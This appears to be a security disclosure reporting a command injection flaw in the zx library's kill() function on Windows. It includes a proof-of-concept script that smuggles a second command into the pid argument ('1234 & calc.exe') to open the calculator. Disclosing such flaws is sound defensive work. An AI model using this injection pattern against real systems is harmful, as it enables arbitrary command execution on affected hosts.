Description
A command injection vulnerability exists in the kill() function of the zx library when running on Windows. The function directly interpolates the pid argument into a shell command executed via child_process.exec(), without proper validation. An attacker controlling the pid input can execute arbitrary commands, resulting in remote code execution (RCE) on the affected system.

Vulnerable Code:
https://github.com/google/zx/blob/main/src/core.ts#L1040-L1046

Proof of Concept (PoC):

1. Create poc2.mjs:

#!/usr/bin/env zx

import { kill } from 'zx';

console.log('Running PoC for command injection vulnerability in kill()...');

// This vulnerability only works on Windows
if (process.platform !== 'win32') {
  console.log('This PoC is specifically designed for Windows. Aborted.');
  process.exit(0);
}

// Malicious payload: open calculator
const maliciousPid = '1234 & calc.exe';
console.log(`Payload to be injected: ${maliciousPid}`);

console.log('Calling kill() function with the payload...');

try {
  await kill(maliciousPid);
} catch (error) {
  console.log('Caught error from taskkill (this is expected).');
}

console.log('If PoC is successful, Windows Calculator should open now.');

2. Save the PoC as poc2.mjs.
3. Run on a Windows: "zx poc2.mjs"
   Observe that the Windows Calculator (calc.exe) opens, proving arbitrary command execution.

Impact
If an attacker can control the pid argument, they can execute any command on the Windows host, leading to full RCE.